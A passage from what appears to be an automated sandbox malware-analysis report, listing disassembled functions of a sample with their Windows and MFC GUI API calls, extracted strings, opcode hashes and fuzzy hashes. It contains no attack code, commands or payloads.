                                                                            • Opcode ID: f4845cb20616b44370f8469525c32d22f36f1eed6b0200ce31e8e8860017d8b0
                                                                            • Instruction ID: e1aba1473171b548d9f7a1ed3f4eaf32807b3ddca3c24ec23e139c92d167576d
                                                                            • Opcode Fuzzy Hash: f4845cb20616b44370f8469525c32d22f36f1eed6b0200ce31e8e8860017d8b0
                                                                            • Instruction Fuzzy Hash: 0431B53970474182E7174BA7B4843AFA792BB8CBD0F540625EF964B7F4DEB8D8468700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014005261C Relevance: 13.6, APIs: 9, Instructions: 74windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enabled$FocusItemLong
                                                                            • String ID:
                                                                            • API String ID: 1558694495-0
                                                                            • Opcode ID: bc14d47aa4b79442c3aea4068fb871dfeb33e6341fc216263d7e8939d397807a
                                                                            • Instruction ID: 9e283c1fa2a3e6b1c7740dbd58a1dae252da5c9682353df0875103d6ba3fa630
                                                                            • Opcode Fuzzy Hash: bc14d47aa4b79442c3aea4068fb871dfeb33e6341fc216263d7e8939d397807a
                                                                            • Instruction Fuzzy Hash: F0216935301A4086FA12DF57B8897AA67A1AF8EFD4F180024EF9A4B7B5DE79C4428300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400A8088 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 372COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _cwprintf_s_l$CtrlParent
                                                                            • String ID: %TsMFCOutlookBar-%d$%TsMFCOutlookBar-%d%x$MFCOutlookBars$MFCOutlookCustomPages
                                                                            • API String ID: 1970011666-3944741965
                                                                            • Opcode ID: ae71563feeef1afb6d6264f250a19edea5ddca29c7f537d82f32420ed6985acc
                                                                            • Instruction ID: e9ded2ba45f11abdb71424a3650c184c495dd111b38332f976a2df834402c63b
                                                                            • Opcode Fuzzy Hash: ae71563feeef1afb6d6264f250a19edea5ddca29c7f537d82f32420ed6985acc
                                                                            • Instruction Fuzzy Hash: 88F16B32704A8082DA22EB67E4547EE67A1F789FD0F458126EF8E477A6DF38C545CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014017C3E8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleCreateDrawHashState$BitmapEmptyImplImpl::Rect
                                                                            • String ID:
                                                                            • API String ID: 1835183343-3916222277
                                                                            • Opcode ID: 1dd30ef3de7893b16cbd2eaf350dfbbfb478c198fd3735748435f806fdddab59
                                                                            • Instruction ID: 2b2c4141b1b298af38f14e5f241cb1ecffaeea0d30ec29ba6a7e7e9b17cdf321
                                                                            • Opcode Fuzzy Hash: 1dd30ef3de7893b16cbd2eaf350dfbbfb478c198fd3735748435f806fdddab59
                                                                            • Instruction Fuzzy Hash: F2912676714A80CBE721CF6AE490B9D77B1F758B98F10512AEF8993B68DB34D844CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400B8308 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleCreateHash$BitmapFillImplImpl::Rect
                                                                            • String ID:
                                                                            • API String ID: 113466278-3916222277
                                                                            • Opcode ID: 0b6a335531ba7a3bdacd10959179f7ff58db67859003d5e4fa52df3a6ae26992
                                                                            • Instruction ID: 3c9f487d59c63fbaeb8a760d500a313c2579ee7f934ef2775b96e10e9df73757
                                                                            • Opcode Fuzzy Hash: 0b6a335531ba7a3bdacd10959179f7ff58db67859003d5e4fa52df3a6ae26992
                                                                            • Instruction Fuzzy Hash: FF716C32B14A408AEB21CFAAD4807DD77B1F798B98F044225EF4997BA8EB74C945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140070774 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ObjectSelect$ClientMetricsParentRectText
                                                                            • String ID: VUUU
                                                                            • API String ID: 816482960-2040033107
                                                                            • Opcode ID: c859bcf02477eb0d59cadfbb2fe709e337bc14a4784d9ba0a4638fbce7adcb5c
                                                                            • Instruction ID: 1eb4734927312e715c5e05fbd207b49a99fda62a87f31d38a6396063cc9997fa
                                                                            • Opcode Fuzzy Hash: c859bcf02477eb0d59cadfbb2fe709e337bc14a4784d9ba0a4638fbce7adcb5c
                                                                            • Instruction Fuzzy Hash: 0F71BC32711A809BEB5ADB76D454BEC7360FB89B88F084225EF5917BA5DF38D811C380
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400282D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: gfffffff$gfffffff
                                                                            • API String ID: 0-161084747
                                                                            • Opcode ID: 1f1e6a89f1d7e68e61aa7bc356aaf4b8387905e958a024812b6bf8c420eca9fe
                                                                            • Instruction ID: f0ab44d4446b7fc77edd267e8b032e05e3df68ee44204ab21907875324d82842
                                                                            • Opcode Fuzzy Hash: 1f1e6a89f1d7e68e61aa7bc356aaf4b8387905e958a024812b6bf8c420eca9fe
                                                                            • Instruction Fuzzy Hash: 5951E676602B8482EA26DB6BF4043EC6350F75CBD4F104216EFAD877A6EB34D592C302
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140048784 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 125windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfolstrcmp
                                                                            • String ID: @$P
                                                                            • API String ID: 72408025-358147200
                                                                            • Opcode ID: 9b4a1d331ab9b5b9905df8cd75909a6b647ed332f2d9b0f823c18f192af6fe88
                                                                            • Instruction ID: d876959027bd8ad338ba3663127eb71566e54495c98ea9fe1bf380ec3c8c3c65
                                                                            • Opcode Fuzzy Hash: 9b4a1d331ab9b5b9905df8cd75909a6b647ed332f2d9b0f823c18f192af6fe88
                                                                            • Instruction Fuzzy Hash: A341803670064482EB369B57E444BAE6360FB88BC8F658825EF4D47AB5DF39C8428744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140042364 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindFreeLoadLockSizeofWindow
                                                                            • String ID: AFX_DIALOG_LAYOUT
                                                                            • API String ID: 4180966417-2436846380
                                                                            • Opcode ID: 2724af04415aef2300b408afa8ede3cad56ec821975ae9afec82ea3c9e9e527c
                                                                            • Instruction ID: 3e6dca832cb4ddcea6f4b38cf49366494ca433c757d1734ad14e1a37070202a0
                                                                            • Opcode Fuzzy Hash: 2724af04415aef2300b408afa8ede3cad56ec821975ae9afec82ea3c9e9e527c
                                                                            • Instruction Fuzzy Hash: EB218435302A5185EA57DB63A8147AA6290EF8DFD0F8A4434BF494BBB5EF38C4428304
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014007C4B0 Relevance: 12.2, APIs: 8, Instructions: 158windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3509494761-0
                                                                            • Opcode ID: 1dd3103755a72a86f26e40cb4036a7b7f95708a67c42d041ce306ccd00e559a5
                                                                            • Instruction ID: dcc2b34346dff6352a43abd05f8057f79a49abdf778e89e90ca0d4f460fb08a8
                                                                            • Opcode Fuzzy Hash: 1dd3103755a72a86f26e40cb4036a7b7f95708a67c42d041ce306ccd00e559a5
                                                                            • Instruction Fuzzy Hash: 86614B36315A8482EB5ADB67D594BED27A0BB8CFC4F084126EF4A477A2DF38C551C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401044B4 Relevance: 12.1, APIs: 8, Instructions: 78windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Destroy$AcceleratorMessageParentSendTablestd::ios_base::~ios_base
                                                                            • String ID:
                                                                            • API String ID: 3769829651-0
                                                                            • Opcode ID: 7e4275439e416f71babe47deb490907d5c504922a8d4c22e38454664a1c7e285
                                                                            • Instruction ID: 2746fe778679dcdd7c41355b0586938590abc6458db6f299f03e2624441c3196
                                                                            • Opcode Fuzzy Hash: 7e4275439e416f71babe47deb490907d5c504922a8d4c22e38454664a1c7e285
                                                                            • Instruction Fuzzy Hash: 46416D76614A4083EB56DB23E8987E92361F7D8F94F140225EB8A4BAFADF78C541C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013A850 Relevance: 12.1, APIs: 8, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Window$InvalidateUpdate$CursorEmptyEventMouseOffsetRedrawTrack
                                                                            • String ID:
                                                                            • API String ID: 898900272-0
                                                                            • Opcode ID: f44cfa395ae84e5a75cf22e06b5b3ad1efdd4674c80543037bf5baf526d2eda8
                                                                            • Instruction ID: 44a3f421ae71f3cbfd92bebdaaef7c036aef86a4dc5d23fe98613d0fa3f57648
                                                                            • Opcode Fuzzy Hash: f44cfa395ae84e5a75cf22e06b5b3ad1efdd4674c80543037bf5baf526d2eda8
                                                                            • Instruction Fuzzy Hash: 71315BB2704B8097F7598B23D51879A77A2F788F85F440116CB4947BA0DF79D975CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014005E294 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 414windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: *?<>|
                                                                            • API String ID: 3850602802-3491500753
                                                                            • Opcode ID: 189567c8db9f998c3b384a030d883ac9a0580e8dbd92e0a00ae925a14ce7e0dc
                                                                            • Instruction ID: d04b4e73322d1e88e80239e2509df6a60a6e6297548a505dfe526319ef944143
                                                                            • Opcode Fuzzy Hash: 189567c8db9f998c3b384a030d883ac9a0580e8dbd92e0a00ae925a14ce7e0dc
                                                                            • Instruction Fuzzy Hash: 41028776705B8182EA05EB67E8953EE63A1F78DBD0F495012EF89837A6DF78C841C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014008A008 Relevance: 10.8, APIs: 7, Instructions: 250windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$Long$ClassMessageSend$DrawExtentIconParentPoint32TextWindow
                                                                            • String ID:
                                                                            • API String ID: 2492759098-0
                                                                            • Opcode ID: cefacff278c3597989e92d034f42deb3e9b76a862fb833b296513c2a6cd9c292
                                                                            • Instruction ID: a3f7d2c106c1ef24765c38f413403dd9dc2ebf8af7e83e85ebc0c8878830683f
                                                                            • Opcode Fuzzy Hash: cefacff278c3597989e92d034f42deb3e9b76a862fb833b296513c2a6cd9c292
                                                                            • Instruction Fuzzy Hash: 3BA1BE36B10A408AEB06DF66E4487ED33A1B78DBD8F044225EF5A53BA5DF38C505C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014017834C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 197windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BringHookWindowWindows$CurrentThreadUnhook
                                                                            • String ID: mdiclient
                                                                            • API String ID: 320092646-1999401180
                                                                            • Opcode ID: 61338ff33872063c71c3164406f07be044dc1fda79021bf4c167b97f8fa8890a
                                                                            • Instruction ID: 79fffb5a51818ca8cc11679eef1e11aab78abcecc438769c1460de8bfdc0f690
                                                                            • Opcode Fuzzy Hash: 61338ff33872063c71c3164406f07be044dc1fda79021bf4c167b97f8fa8890a
                                                                            • Instruction Fuzzy Hash: BA913736B05B808AEB55DFAAE4847EE37A1F788B88F144025EF4957BA9DF38C415C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401185F8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
